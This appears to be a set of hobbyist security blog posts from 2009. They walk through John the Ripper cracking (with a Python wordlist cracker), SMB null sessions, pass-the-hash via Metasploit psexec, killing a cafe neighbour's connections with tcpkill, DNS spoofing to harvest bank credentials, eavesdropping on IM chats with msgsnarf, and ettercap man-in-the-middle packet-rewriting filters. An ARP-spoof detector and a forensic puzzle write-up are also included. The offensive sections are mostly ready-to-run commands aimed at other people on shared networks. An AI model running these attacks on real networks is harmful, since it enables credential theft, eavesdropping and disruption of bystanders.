John also offers a brute force mode. In this type of attack, the program goes through all the possible plaintexts, hashing each one and comparing it to the input hash. John uses character frequency tables to try plaintexts containing more frequently-used characters first. This method is useful for cracking passwords which do not appear in dictionary wordlists, but it does take a long time to run.

This demo assumes you have already obtained the hashes from a Windows system (hashes.txt in this example, in pwdump format) and a wordlist (readily available on the web):

# ./john --wordlist=mywordlist.txt hashes.txt
Loaded 2 password hashes with no different salts (LM DES [128/128 BS SSE2])
MYPASS (admin)
guesses:2 time: 0:00:00:00 100% c/s 1298k trying: ANOS - ANYONE

John reports the admin account's password as MYPASS. Note that the LM hash is computed over the uppercased password, so John shows LM results in upper case; the real password may be 'mypass' or any other capitalisation, and cracking the NT hash (which preserves case) tells you which. The guest account has a blank password, which John recognises immediately. John computed these in less than a second with my chosen wordlist. Remember, you can only crack a password if it is in the wordlist (or reachable from it by the mangling rules), so take your time choosing a good wordlist and tailor it to what you learn when profiling a target.

For raw hashes such as MD5 or SHA-1, John's input file needs to follow the format "user:hash"; a bare hash on its own line will not load. The jumbo build also needs to be told the type (e.g. --format=raw-md5), since a 32-character hex string on its own is ambiguous.

# echo -n "mypass" | openssl dgst -md5 > hash.txt

The above writes the hash to hash.txt (newer OpenSSL versions prefix it with "(stdin)= ", which you must strip), but John will not read the bare hash. Edit hash.txt to put a username and a colon (:) in front of the hash; John can then load the file and attempt to crack it.

You can also create or expand a wordlist with John's word-mangling rules, writing the candidates to stdout instead of cracking:

# ./john --wordlist=mylist.txt --rules --stdout
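To show what the wordlist-plus-rules mode is doing under the hood, and why the input has to be "user:hash", here is an added example (my own code, not John's) that loads raw MD5/SHA-1 hashes in that format, rejects a bare hash line, and runs a few John-style mangling rules over a wordlist. The hash file is constructed from known passwords so the run is self-checking; the rule set is a small illustrative subset, not John's actual rule language.

```python
import hashlib

# Added example (not John the Ripper's code): a wordlist attack with a handful
# of John-style mangling rules against "user:hash" lines holding raw MD5 or
# SHA-1 hashes. The sample hashes are constructed from known passwords.

FORMATS = {32: "md5", 40: "sha1"}     # hex digest length -> hashlib name


def load_hashes(text):
    """Parse John's 'user:hash' lines; a bare hash on its own line is rejected."""
    targets = []
    for lineno, raw in enumerate(text.splitlines(), 1):
        line = raw.strip()
        if not line:
            continue
        if ":" not in line:
            raise ValueError("line %d: expected user:hash, got a bare hash" % lineno)
        user, digest = line.split(":", 1)
        digest = digest.strip().lower()
        if len(digest) not in FORMATS or any(c not in "0123456789abcdef" for c in digest):
            raise ValueError("line %d: not a raw MD5/SHA-1 hex digest" % lineno)
        targets.append((user.strip(), digest))
    return targets


def mangle(word):
    """Yield candidates in the spirit of John's wordlist rules: case variants,
    appended digits, reversal and a few leet substitutions."""
    seen = set()
    for base in (word, word.lower(), word.upper(), word.capitalize()):
        for cand in (base, base + "1", base + "123", base[::-1],
                     base.replace("a", "@").replace("o", "0").replace("e", "3")):
            if cand not in seen:
                seen.add(cand)
                yield cand


def crack(hash_text, wordlist):
    """Return {user: password} for every hash hit by the mangled wordlist."""
    pending = {}                      # algorithm -> {digest: user}
    for user, digest in load_hashes(hash_text):
        pending.setdefault(FORMATS[len(digest)], {})[digest] = user
    cracked = {}
    for word in wordlist:
        for cand in mangle(word):
            for alg, table in pending.items():
                if not table:
                    continue
                digest = hashlib.new(alg, cand.encode()).hexdigest()
                user = table.pop(digest, None)
                if user is not None:
                    cracked[user] = cand
            if not any(pending.values()):
                return cracked        # everything cracked, stop early
    return cracked


def _h(alg, pw):
    return hashlib.new(alg, pw.encode()).hexdigest()


# Constructed hash file: passwords chosen so the rules above reach most of them.
SAMPLE_HASHES = "\n".join([
    "alice:" + _h("md5", "Summer1"),
    "bob:" + _h("sha1", "password"),
    "carol:" + _h("md5", "letmein123"),
    "dave:" + _h("md5", "p@ssw0rd"),
    "eve:" + _h("sha1", "S3cr3t"),       # not derivable from the wordlist
])
WORDLIST = ["summer", "password", "letmein", "qwerty"]

if __name__ == "__main__":
    for user, pw in crack(SAMPLE_HASHES, WORDLIST).items():
        print("%s:%s" % (user, pw))
```

Each candidate is hashed once per algorithm present and looked up against every outstanding hash, which is the same reason John loads all hashes of a format together rather than cracking them one at a time. eve's hash survives because nothing in the wordlist mangles into it, which is the limitation the paragraph above warns about.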

Resources/Good reading:

Playing with netbios shares (smbclient and nmblookup)

So you are on a network and want to learn about your neighbours: their computer names, who is logged on, share names, etc. Windows makes most of this information easy to obtain. Enter smbclient, an ftp-like client for SMB/CIFS resources, and nmblookup, a utility for looking up NetBIOS names. Before enumerating we need to find the IPs of the live Windows clients.

# netdiscover -i eth0 -r //Discover live clients that respond to our arp requests

I personally would use nmap for this, as it has many more scan techniques than just the ARP method. After we identify our potential target, we use it in smbclient and nmblookup.

# nmblookup -A //resolve the NetBIOS names registered by the host. The hex code in the second column tells us what each name is for: if you see <03> next to a name that is not the computer name, the text to the left of '<03>' is the currently logged-in user. Below is a list, taken from ,, of what the hex codes mean.

Number(h)  Type  Usage
(Type: U = unique name, G = group name. The first block is registered under the computer name, the <03> Messenger Service entry that follows under the user name, and the remaining entries under the domain/workgroup name.)

00   U   Workstation Service
01   U   Messenger Service
01   G   Master Browser
03   U   Messenger Service
06   U   RAS Server Service
1F   U   NetDDE Service
20   U   File Server Service
21   U   RAS Client Service
22   U   Microsoft Exchange Interchange (MSMail Connector)
23   U   Microsoft Exchange Store
24   U   Microsoft Exchange Directory
30   U   Modem Sharing Server Service
31   U   Modem Sharing Client Service
43   U   SMS Clients Remote Control
44   U   SMS Administrators Remote Control
45   U   SMS Clients Remote Chat
46   U   SMS Clients Remote Transfer
4C   U   DEC Pathworks TCPIP service on Windows NT
42   U   McAfee anti-virus
52   U   DEC Pathworks TCPIP service on Windows NT
87   U   Microsoft Exchange MTA
6A   U   Microsoft Exchange IMC
BE   U   Network Monitor Agent
BF   U   Network Monitor Application
03   U   Messenger Service (user name)
00   G   Domain Name
1B   U   Domain Master Browser
1C   G   Domain Controllers
1D   U   Master Browser
1E   G   Browser Service Elections
00   U   IIS
2B   U   Lotus Notes Server Service
2F   G   Lotus Notes
33   G   Lotus Notes
20   U   DCA IrmaLan Gateway Server Service

Next we can use smbclient to reveal the shares on a particular system.

# smbclient -N -L //list share names and OS type

-N: suppresses the password prompt (we don't know any passwords, so this attempts a null session)
-L: list the shares and any other services it can see.

We can attempt to connect/login to a system share.

# smbclient // -N // try to connect to 'share' on the host without a password

If you are lucky and get into the share, it is the result of a poorly configured share. You can browse the directory, upload/download files and so on. Type help at the prompt for a list of commands at your disposal.

smb: \> help

It's more difficult to set up a proper share on XP with the appropriate permissions than to set up a share that's open to everyone. Sounds like the mindset of the typical Windows user, doesn't it? I'll admit, I was one of them.

Resources/Good reading:

Pass-the-Hash, Who needs a password anyways...

Pass the hash refers to a method of authenticating to a system without the plain-text password. What is used instead is the password hash (the plain-text password run through a one-way algorithm). NTLM authentication only ever uses the hash to compute its challenge response, so whoever holds the hash can answer the challenge without knowing the password. You can't just type the hash into the password prompt, if that's what you're thinking; we need special tools, since Windows doesn't naturally support this for obvious reasons. The tools I'm going to demo are a modified smbclient written in Python, found in BackTrack 4, and the Metasploit psexec module. This demo requires you to obtain the hashes yourself (research fgdump or pwdump).

Enter the following commands for smbclient:
# python ./ //Start the client
# open 139 //opens a SMB connection against host/port
# login_hash user1 your_lmhash your_nthash //logs into the SMB session with a user/hash combo. Note the space between the LM and the NT hash.
example: login_hash mary AAFF5441321GSGW566WT ERGBXHG4J65461DF564DHD
# Shares //list available shares
# use share_name //connects to a specific share

If all goes well and you are logged in, you can go up the file tree, download or upload files, delete files etc. For more commands just type 'help'.

Enter the following commands for Metasploit:
# ./msfconsole //Launch the metasploit framework
msf> use exploit/windows/smb/psexec //select the psexec module to use as the exploit
msf exploit(psexec)>show options //list the options that are needed for the exploit to work
msf exploit(psexec)>set RHOST //sets the target's IP
msf exploit(psexec)>set SMBUser admin //sets the username
msf exploit(psexec)>set SMBPass lm_hash:nt_hash //Sets the LM:NT hashes. Note that you need both, separated only by a ':'. Leave RPORT at 445 (139 won't work).
msf exploit(psexec)>set PAYLOAD windows/exec //sets your payload. Do show payloads for others
msf exploit(psexec)>set CMD calc.exe //sets the command to execute
msf exploit(psexec)>exploit //run the exploit

If all is well, calc.exe should have been executed on the remote system. Obviously you may want to do something more than just run calc, like gain a shell. No problem, just set the required payload and the necessary options and you're good to go.

Wednesday, November 25, 2009


A very useful and fast utility that can actively or passively perform some ARP reconnaissance in order to find which hosts are alive on the network. It performs its task by sending out ARP requests to a subnet you define (for example, and determines that a host is alive if it receives a response. It's very basic but gets the job done.

# netdiscover -i eth0 -r -c 4

-i: Interface to use
-r: Subnet range to scan
-c: Number of times to send each ARP request
-f: Fast mode. This only scans for nodes ending in .1, .100 or .254 in the network

Like I said, it's simple and fast. There are many other similar tools out there that are more feature-rich than this one (like nmap). If there's one thing I like about any given tool it's simplicity and ease of use, and this tool gets a perfect 10/10 for that.

Tcpkill and tcpnice

Tcpkill is a program that can be used to kill live TCP connections to or from a host, network, port or a combination of them all. Similarly, tcpnice doesn't necessarily kill the connections, but attempts to slow them down. Say you're at an internet cafe and some dude sitting next to you is hogging up all the bandwidth with his multiple torrent downloads of illegal software. You're at your machine and you are trying to upload some important documents to your website. The frustration grows as your uploads begin to time out. What can you do to mitigate this issue? Well, thanks to Dug Song, we have two methods to irritate our neighbour.

First we need to perform a MITM (man in the middle) attack (arpspoof or ettercap will do) and enable IP forwarding in your kernel as follows:

# echo 1 > /proc/sys/net/ipv4/ip_forward

We then need to determine which local IP is hogging up the bandwidth. There is a useful sniffer that I use called tcptrack that lists the live connections it sees and the bandwidth/speed of the data being transferred back and forth on each connection.

# tcptrack -i eth0

Once you determine the IP of the bandwidth hogger (in this example, it's time to unleash our magic.

# tcpkill -i eth0 -9 host

The '-9' specifies the degree of brute force to use in killing a connection. Fast connections may require a higher number in order to land a RST in the moving receive window (that's the method used to kill connections: flood the receive window with RST packets to tear the connection down). The default is 3.

This in turn would kill/block all of the traffic going to or from If you wanted to be more specific and only block the port that is using the most bandwidth, you can do this instead.

# tcpkill -i eth0 -9 host and port 4455

Or, if you're really mad at the world, you can wipe out the whole subnet.

# tcpkill -9 net 192.168.1

Similarly, tcpnice can be used to slow connections down rather than simply kill them.

# tcpnice -i eth0 -A host

-A: Inject TCP tiny window advertisements.
-I: Inject ICMP source quench replies.
-M: Inject ICMP fragmentation-needed replies with tiny next-hop MTUs.
-i: interface to listen on
If no option (-A, -I, -M) is given, all would be used.

References/Good reading:

Forensic contest: Puzzle #2

If you recall from one of my previous posts, I found an interesting website,, where you can take part in a forensic puzzle contest with the possibility of winning interesting prizes. Unfortunately, like the first one, I found out about the puzzle after the deadline had passed. However, I still attempted to solve the puzzle in aid of polishing up my skills and to learn as well. Well, this is part #2: solving the second puzzle (on my own, I might add, lol). With puzzle one, I had to look at some solutions to figure out where I went wrong, then had to bang myself in the head for not being able to figure it out myself.

You can start off by importing the pcap file into Wireshark and then applying a display filter for the smtp protocol. Observation showed that Ann sent two emails. The first is not relevant to the puzzle, but the second one is. You have to right click on any packet (one that's part of the second email, not the first; pay close attention so you don't accidentally follow the wrong stream) and click on 'Follow TCP Stream'. By observation, you can determine that Ann's email is and her secret lover's email is Further analysis shows the text that was sent in the email and the items she told him to bring ("fake passport and a bathing suit"). We also see that the name of the document being transferred is "secretrendevouz.docx".

Just to recap some of the answers we already found:
  • fake passport and a bathing suit
  • secretrendevouz.docx
Next we are going to extract the file being transferred as an attachment.
First we separate the TCP streams:
# tcpflow -r evidence02.pcap

We already identified the necessary source and destination IPs in Wireshark for the transfer of the document over the network. It's the largest file that tcpflow outputs (# ls -lh, to see file sizes in the folder). To make things easier, since tcpflow outputs a bunch of files with confusing names, let's rename the necessary file to "file1" (mv 192.168.....etc. file1). Don't actually put '..etc', the actual filename was just too long for me to bother typing out. Next we analyze that file with the 'xxd' utility. We want to look for or estimate the starting bytes of the file. We see that secretrendevouz.docx is being transferred using base64 encoding. This means that we won't be able to find the usual magic starting hex bytes of .docx files, which are '504B0304'. What I did was encode another docx file in base64 and see what its starting bytes were.
# base64 test.docx > test.docx.base64

I then used 'xxd' to see what the magic bytes were for the base64-encoded file.
# xxd -l 4 test.docx.base64 ans: "55457344" (the ASCII text "UEsD")

Bingo. The next few commands are the ones I used to extract the docx file from the TCP stream.

# xxd -ps file1 > file2

I then opened the file in a text editor, did a search for the magic bytes '55457344', and when they were found I deleted all the bytes before them. I saved the file, then converted it back into its raw binary format with the following command.

# xxd -ps -r file2 > secretrendevouz.docx.base64

We now have the file in base64 encoding. All we have to do now is decode it.

# base64 -d secretrendevouz.docx.base64 > secretrendevouz.docx

I then got the MD5 hash:
# md5sum secretrendevouz.docx

Then I opened the document in Microsoft Word on a Windows machine and extracted the rest of the information required for the puzzle.

Rendez-vous point: Playa del Carmen, Mexico

MD5 sum of the picture: aadeace50997b1ba24b09ac2ef1940b7

Unfortunately I couldn't find the password; it's mostly laziness on my part to do the relevant research for a tool that extracts SMTP passwords. I figured ettercap or dsniff would have those abilities but had no success with them. I'll update the blog whenever I do figure out how to do so.


Finally figured out how to get the password. It turns out that the password is encoded in base64 format. All that's needed is the base64-encoded password string, which is fed into the base64 program for decoding. This is the command I used to get the password:

# echo "NTU4cjAwbHo=" | base64 -di -

I got the "NTU4cjAwbHo=" string from analyzing the SMTP communication stream in Wireshark.


Msgsnarf is a tool from the dsniff suite: a sniffer that aims to parse only chat messages (conversations) from popular IMs (instant messengers). Currently, msgsnarf can record selected messages from:
  • AOL Instant Messenger
  • ICQ 2000
  • IRC
  • MSN messenger
  • Yahoo messenger
You are gonna need to be the man in the middle so you can see all the traffic going between the targeted nodes (arpspoof or ettercap can be used for this).

# msgsnarf -i eth0
or you can filter specific hosts with a tcpdump filter expression:
# msgsnarf -i eth0 host

'-i': interface to listen or sniff on (for live connections)

If you use the '-p' option instead of '-i', you can read from a pcap capture file and parse that for conversations. This method is more for forensic purposes.

This is a video of me performing this attack.

Eavesdropping on an MSN convo using msgsnarf from aerokid240 on Vimeo.

Resources/good reading:

Tcpdump filters

For those that don't know, tcpdump is a command-line packet analyzer (sniffer) that can perform live packet analysis. With tcpdump you can filter the traffic so that not all traffic is parsed or logged. Many programs and sniffers tend to follow tcpdump's filter syntax because of its popularity and ease of use. Below are some examples of tcpdump filters taken from "":

Filtering hosts :

- Match any traffic involving as destination or source
# tcpdump -i eth1 host

- As source only
# tcpdump -i eth1 src host

- As destination only
# tcpdump -i eth1 dst host

# tcpdump src net mask
# tcpdump src net

Filtering ports :
- Match any traffic involving port 25 as source or destination
# tcpdump -i eth1 port 25

# tcpdump -n portrange 22-23

- Source
# tcpdump -i eth1 src port 25

- Destination
# tcpdump -i eth1 dst port 25

Network filtering :

# tcpdump -i eth1 net 192.168
# tcpdump -i eth1 src net 192.168
# tcpdump -i eth1 dst net 192.168

Protocol filtering :

# tcpdump -i eth1 arp
# tcpdump -i eth1 ip

# tcpdump -i eth1 tcp
# tcpdump -i eth1 udp
# tcpdump -i eth1 icmp

Let's combine expressions :

Negation : ! or "not" (without the quotes)
Concatenate : && or "and"
Alternate : || or "or"

- This rule will match any TCP traffic on port 80 (web) with or as destination host
# tcpdump -i eth1 '((tcp) and (port 80) and ((dst host or (dst host'

- Will match any ICMP traffic involving the destination with physical/MAC address 00:01:02:03:04:05
# tcpdump -i eth1 '((icmp) and ((ether dst host 00:01:02:03:04:05)))'

- Will match any traffic for the destination network 192.168 except destination host
# tcpdump -i eth1 '((tcp) and ((dst net 192.168) and (not dst host'
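To make the precedence and direction rules above concrete, here is an added example, not from the post and not tcpdump's own code: a small Python evaluator for the subset of the filter syntax used on this page (host/net/port/portrange with an optional src/dst, the protocol keywords, and/or/not with parentheses) run over constructed packets. It deliberately leaves out the rest of the BPF language (CIDR and mask forms of net, ether, vlan, byte-offset comparisons); Packet, FilterParser and tcpdump_match are names chosen for this example.

```python
import re
from dataclasses import dataclass

@dataclass
class Packet:  # constructed packet model: only the fields the filter primitives look at
    proto: str            # "tcp", "udp", "icmp" or "arp"
    src: str = ""         # dotted IPv4 addresses; empty for arp
    dst: str = ""
    sport: int = 0        # transport ports; 0 when the protocol has none
    dport: int = 0

PROTOCOLS = {"tcp", "udp", "icmp", "arp", "ip"}
TOKEN_RE = re.compile(r"\(|\)|&&|\|\||!|[^\s()]+")

class FilterParser:
    # Recursive descent over the page's subset of tcpdump syntax, producing a tuple tree.
    # Precedence is tcpdump's: 'not' binds tightest, then 'and', then 'or'.
    def __init__(self, expression):
        self.tokens = TOKEN_RE.findall(expression)
        self.pos = 0
    def peek(self):
        return self.tokens[self.pos] if self.pos < len(self.tokens) else None
    def take(self):
        tok = self.peek()
        if tok is None:
            raise ValueError("unexpected end of filter expression")
        self.pos += 1
        return tok
    def binary(self, ops, tag, below):
        node = below()
        while self.peek() in ops:
            self.take()
            node = (tag, node, below())
        return node
    def or_expr(self): return self.binary(("or", "||"), "or", self.and_expr)
    def and_expr(self): return self.binary(("and", "&&"), "and", self.unary)
    def unary(self):
        if self.peek() in ("not", "!"):
            self.take()
            return ("not", self.unary())
        if self.peek() == "(":
            self.take()
            node = self.or_expr()
            if self.take() != ")":
                raise ValueError("missing closing parenthesis")
            return node
        return self.primitive()
    def primitive(self):
        tok = self.take()
        if tok in PROTOCOLS:
            return ("proto", tok)
        direction = None                        # None means "src or dst", as in tcpdump
        if tok in ("src", "dst"):
            direction, tok = tok, self.take()
        if tok in ("host", "net"):
            return (tok, direction, self.take())
        if tok == "port":
            return ("port", direction, int(self.take()))
        if tok == "portrange":
            lo, hi = self.take().split("-")
            return ("portrange", direction, (int(lo), int(hi)))
        raise ValueError(f"unsupported primitive {tok!r}")

def either(direction, src_hit, dst_hit):
    return src_hit if direction == "src" else dst_hit if direction == "dst" else (src_hit or dst_hit)

def in_net(ip, prefix):
    # 'net 192.168' is a dotted prefix (192.168.0.0/16); CIDR and 'mask' forms are not handled here
    want = prefix.split(".")
    return bool(ip) and ip.split(".")[:len(want)] == want

def matches(node, pkt):
    kind = node[0]
    if kind == "or":
        return matches(node[1], pkt) or matches(node[2], pkt)
    if kind == "and":
        return matches(node[1], pkt) and matches(node[2], pkt)
    if kind == "not":
        return not matches(node[1], pkt)
    if kind == "proto":
        return pkt.proto in ("tcp", "udp", "icmp") if node[1] == "ip" else pkt.proto == node[1]
    direction, value = node[1], node[2]
    if kind == "host":
        return either(direction, pkt.src == value, pkt.dst == value)
    if kind == "net":
        return either(direction, in_net(pkt.src, value), in_net(pkt.dst, value))
    if pkt.proto not in ("tcp", "udp"):
        return False                            # port primitives never match icmp or arp
    if kind == "port":
        return either(direction, pkt.sport == value, pkt.dport == value)
    lo, hi = value                              # portrange
    return either(direction, lo <= pkt.sport <= hi, lo <= pkt.dport <= hi)

def tcpdump_match(expression, pkt):  # True if 'tcpdump <expression>' would capture this packet
    parser = FilterParser(expression)
    node = parser.or_expr()
    if parser.peek() is not None:
        raise ValueError(f"unexpected token {parser.peek()!r}")
    return matches(node, pkt)
```

Call tcpdump_match with the expression exactly as it would sit inside the shell quotes, for example tcpdump_match("((tcp) and (port 80) and ((dst host 10.0.0.5) or (dst host 10.0.0.6)))", Packet("tcp", "10.0.0.1", "10.0.0.6", 51000, 80)). Two things worth noticing from running it: a bare "host" or "port" matches either direction, which is why the src/dst variants exist, and "port 80" is false for ICMP even though "not port 80" is then true, which matters when you build exclusion filters.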

Resources/Good reading:

DNS spoofing (dnsspoof)

When a web browser requests a page such as '', it sends a DNS request to a DNS server to resolve the DNS name, i.e. '', to its associated IP address. Where DNS poisoning comes into play is that once that request is sent, the web browser is waiting for the DNS server's reply/answer to the query. An attacker can see the request going out and in turn send their own DNS reply/answer before the DNS server does. It's a race against time, and usually, if the attacker is on the same subnet or network (one or a few hops away) as the system that is sending the request, the attacker's response will reach its intended destination before any outside reply does. The danger in this attack is when the attacker spoofs important websites such as your bank's website. The fake web server will have exactly the same interface as the real bank website, so the attacker can wait for you to enter your credentials on it and capture them.


(ettercap can also be used for this)

First you need to create what is called a hosts file. In your text editor type the following:

Save this file as 'hosts.txt'.
Perform a MITM (man in the middle) attack:
# arpspoof -i eth0 -t
# arpspoof -i eth0 -t

Start spoofing with these commands:
# dnsspoof -i eth0 -f hosts.txt

or, if you were sniffing an entire network and not just between the gateway and one host, you can add a tcpdump filter expression at the end.
# dnsspoof -i eth0 -f hosts.txt host
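Every recipe on this page that sits between a host and its gateway starts with ARP cache poisoning (arpspoof above, or ettercap -M arp), and netdiscover earlier relies on the same request/reply exchange. As an added example, not from the post and not part of the dsniff suite, here is what those replies look like from the defender's side: a Python parser for Ethernet II + ARP frames and a watcher that remembers which MAC first claimed each IP and flags a later claim from a different MAC, run over constructed sample frames (the addresses, make_arp, ArpWatcher and scan are all invented for this example). A claim can change for legitimate reasons too (a replaced NIC, DHCP churn), so seed the watcher with the gateway's real MAC where you know it and treat an alert as something to look at, not as proof.

```python
import struct

ETH = struct.Struct("!6s6sH")           # Ethernet II header: dst MAC, src MAC, EtherType
ARP = struct.Struct("!HHBBH6s4s6s4s")   # htype, ptype, hlen, plen, opcode, sha, spa, tha, tpa
ETHERTYPE_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
BROADCAST = "ff:ff:ff:ff:ff:ff"

def mac_to_str(b):
    return ":".join(f"{x:02x}" for x in b)

def ip_to_str(b):
    return ".".join(str(x) for x in b)

def mac_to_bytes(s):
    return bytes(int(x, 16) for x in s.split(":"))

def ip_to_bytes(s):
    return bytes(int(x) for x in s.split("."))

def parse_arp(frame):
    """Decode an Ethernet II + ARP frame into a dict; return None for anything that is not IPv4 ARP."""
    if len(frame) < ETH.size + ARP.size:
        return None
    eth_dst, eth_src, ethertype = ETH.unpack_from(frame, 0)
    if ethertype != ETHERTYPE_ARP:
        return None
    htype, ptype, hlen, plen, op, sha, spa, tha, tpa = ARP.unpack_from(frame, ETH.size)
    if (htype, ptype, hlen, plen) != (1, 0x0800, 6, 4):
        return None
    return {"eth_src": mac_to_str(eth_src), "eth_dst": mac_to_str(eth_dst), "op": op,
            "sender_mac": mac_to_str(sha), "sender_ip": ip_to_str(spa),
            "target_mac": mac_to_str(tha), "target_ip": ip_to_str(tpa)}

def make_arp(op, sender_mac, sender_ip, target_mac, target_ip):
    """Assemble a frame with the same two structs; used here only to build the sample traffic."""
    eth_dst = BROADCAST if op == ARP_REQUEST else target_mac
    return (ETH.pack(mac_to_bytes(eth_dst), mac_to_bytes(sender_mac), ETHERTYPE_ARP)
            + ARP.pack(1, 0x0800, 6, 4, op, mac_to_bytes(sender_mac), ip_to_bytes(sender_ip),
                       mac_to_bytes(target_mac), ip_to_bytes(target_ip)))

class ArpWatcher:
    """Remember which MAC first claimed each IP (or was configured for it) and flag later, conflicting claims."""

    def __init__(self, known=None):
        self.claims = dict(known or {})   # ip -> mac; seed with the gateway's real MAC where you know it
        self.alerts = []

    def observe(self, frame):
        arp = parse_arp(frame)
        if arp is None:
            return None                   # not ARP: nothing to learn from it here
        ip, mac = arp["sender_ip"], arp["sender_mac"]
        if mac != arp["eth_src"]:         # the ARP sender field should match the frame's source MAC
            self.alerts.append({"ip": ip, "seen": mac, "expected": arp["eth_src"],
                                "reason": "ARP sender MAC differs from Ethernet source MAC"})
        if ip in self.claims and self.claims[ip] != mac:
            self.alerts.append({"ip": ip, "seen": mac, "expected": self.claims[ip],
                                "reason": "IP already claimed by a different MAC"})
        else:
            self.claims.setdefault(ip, mac)
        return arp

# Constructed sample segment (every address below is invented for this example).
GATEWAY_IP, GATEWAY_MAC = "192.168.1.1", "00:11:22:33:44:55"
VICTIM_IP, VICTIM_MAC = "192.168.1.20", "00:aa:bb:cc:dd:ee"
ROGUE_MAC = "de:ad:be:ef:00:01"

SAMPLE_FRAMES = [
    make_arp(ARP_REQUEST, VICTIM_MAC, VICTIM_IP, "00:00:00:00:00:00", GATEWAY_IP),  # who has the gateway?
    make_arp(ARP_REPLY, GATEWAY_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),            # genuine answer
    make_arp(ARP_REPLY, ROGUE_MAC, GATEWAY_IP, VICTIM_MAC, VICTIM_IP),              # the reply arpspoof keeps sending
    b"\xff" * 14 + b"\x00" * 46,                                                    # not ARP, ignored
]

def scan(frames, known=None):
    """Run the watcher over a list of raw frames and return its alerts."""
    watcher = ArpWatcher(known)
    for frame in frames:
        watcher.observe(frame)
    return watcher.alerts

if __name__ == "__main__":
    for alert in scan(SAMPLE_FRAMES):
        print(f"{alert['ip']}: {alert['reason']} (saw {alert['seen']}, expected {alert['expected']})")
```

On real traffic you would feed scan() the frames from a pcap (or a raw socket on the segment) instead of SAMPLE_FRAMES; the parser rejects anything that is not Ethernet/IPv4 ARP, so mixed captures are fine. The first check (ARP sender MAC versus Ethernet source MAC) catches a sloppier class of forged frames than arpspoof's, where the attacker fills in the ARP body but not the frame header consistently.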

Resources/Good reading:

More On Ettercap plus Filter examples

This post is a follow up to my previous post on using an ettercap filter to change some text on the fly throughout an MSN conversation. Finding information on Google about ettercap filters wasn't as easy as I would have anticipated; it took me several minutes to find usable info. Below is a summary of my findings, which mainly aims to be a reference or cheatsheet, if you will, for some of its popular uses.

Just to recap, if you haven't done your homework on the basics of ettercap yet:

Basic Sniffing

Network sniffing in quiet text mode with no ARP poisoning or ARP scan. Ettercap would listen on the eth0 interface and display only information of interest, like passwords.

ettercap -Tzq -i eth0

To sniff traffic between 2 hosts:

ettercap -i eth0 -Tq -M ARP:remote /victim_ip_A/ /victim_ip_B/

'-i': What interface to listen on
'-Tq': Run in quiet, text mode
'-M ARP:remote': Perform a man-in-the-middle (MITM) ARP spoof between two points or n in the network, in our example above between /victim_ip_A/ and /victim_ip_B/.

Sniff multiple hosts by being in the middle between the network nodes and the gateway:

ettercap -i eth0 -T -M arp / / /

Capture traffic on a certain port only:

ettercap -i eth0 -T -M arp / / /

To sniff traffic between all hosts on the network:

ettercap -T -M arp // //

Note that the above is generally not recommended. Doing so would result in network performance degradation, as your network card is not powerful enough to process all the network traffic (assuming this is a reasonably sized network). A network like this would suffer from packet loss and congestion, since there would be a lot of retransmissions.

Ettercap is capable of:
• sniffing HTTPS
• Injecting traffic
• OS fingerprinting

Logging The Output

ettercap -Tq -L filename -M ARP:remote /ip_address_A/ /ip_address_B/

Other useful options
-F use preconfigured or custom filters
-P use plugin (to view plugins use ettercap -TQ, then press p to view the plugin menu)
-c Compress the output (gzip)

More on Ettercap Filters:
Monitoring web traffic (port 80):
Note: When you monitor web traffic, the packets that you see may come across in an encoded (compressed) form. Ettercap needs plain-text traffic in order to filter effectively. The encoding that web pages use, from my observations (I'm not sure or aware of any others), is requested with the header "Accept-Encoding: gzip, deflate".

Below is a filter that zaps the encoding to force plain-text communication. The replacement strings are the same length as the words they overwrite ("gzip" becomes four spaces, "deflate" seven), so the packet length stays the same:
if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "gzip")) {
      replace("gzip", "    "); # four spaces
      msg("whited out gzip\n");
   }
}

if (ip.proto == TCP && tcp.dst == 80) {
   if (search(DATA.data, "deflate")) {
      replace("deflate", "       "); # seven spaces
      msg("whited out deflate\n");
   }
}

Replacing text in a packet:
if (ip.proto == TCP && search(DATA.data, "lol")) {
   replace("lol", "smh");
   msg("filter ran");
}

Display a message if the tcp port is 22:
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      msg("SSH packet\n");
   }
}

Log all telnet traffic, also execute ./program on every packet:
if (ip.proto == TCP) {
   if (tcp.src == 23 || tcp.dst == 23) {
      log(DATA.data, "./logfile.log");
      exec("./program");
   }
}

Log all traffic except http:
if (ip.proto == TCP && tcp.src != 80 && tcp.dst != 80) {
   log(DATA.data, "./logfile.log");
}

Some operation on the payload of the packet (compare and rewrite bytes at an offset):
if (DATA.data + 20 == 0x4142) {
   DATA.data + 20 = 0x4243;
} else {
   DATA.data = "modified";
   DATA.data + 20 = 0x4445;
}

Drop any packet containing "ettercap":
if (search(DATA.data, "ettercap")) {
   msg("some one is talking about us...\n");
   drop();
}

Log ssh decrypted packets matching the regexp:
if (ip.proto == TCP) {
   if (tcp.src == 22 || tcp.dst == 22) {
      if (regex(DECODED.data, ".*login.*")) {
         log(DECODED.data, "./decrypted_log");
      }
   }
}

Dying packets (TTL about to run out; the threshold is just an example value):
if (ip.ttl < 5) {
   msg("The packet will die soon\n");
}

String comparison at a given offset:
if (DATA.data + 40 == "ette") {
   log(DATA.data, "./logfile");
}

Inject a file after a specific packet (the file name is a placeholder):
if (tcp.src == 21 && search(DATA.data, "root")) {
   inject("./fake_response");
}

Replace the entire packet with another (drop the original, then inject the replacement; the file name is a placeholder):
if (tcp.src == 23 && search(DATA.data, "microsoft")) {
   drop();
   inject("./fake_telnet");
}

Filter only a specific ip address:
if (ip.src == '') {
   drop();
}

Translate the port of the tcp packet from 80 to 81:
if (tcp.dst == 80) {
   tcp.dst -= 1;
   tcp.dst += 2;
}

Resources/Good reading:

Tuesday, November 24, 2009

Ettercap and Filters (Pwning an MSN convo)

Ettercap is a multi-purpose sniffer that can perform man in the middle attacks on a switched network. It can sniff live connections and modify some of a packet's contents on the fly. What I'm going to show you is how you can modify certain words in an ongoing MSN convo. You are gonna have to be on the same network, so a perfect scenario would be an internet cafe or wireless hotspot.
You would need to create a filter that tells ettercap to change 'lol', in our example, to whatever we want, in this case 'smh'.

Creating the filter:
# touch msn.txt
open msn.txt in a text editor and type the following:
if (ip.proto == TCP && search(DATA.data, "lol")) { replace("lol", "smh"); msg("filter ran"); }

Save and exit your work.
NB: Just to point out, there shouldn't be any space between the 'e' and '(' in the replace function, and in 'DATA.data' it's necessary for 'DATA' to be in all caps. This language is case sensitive, so putting 'data.data' would not work.

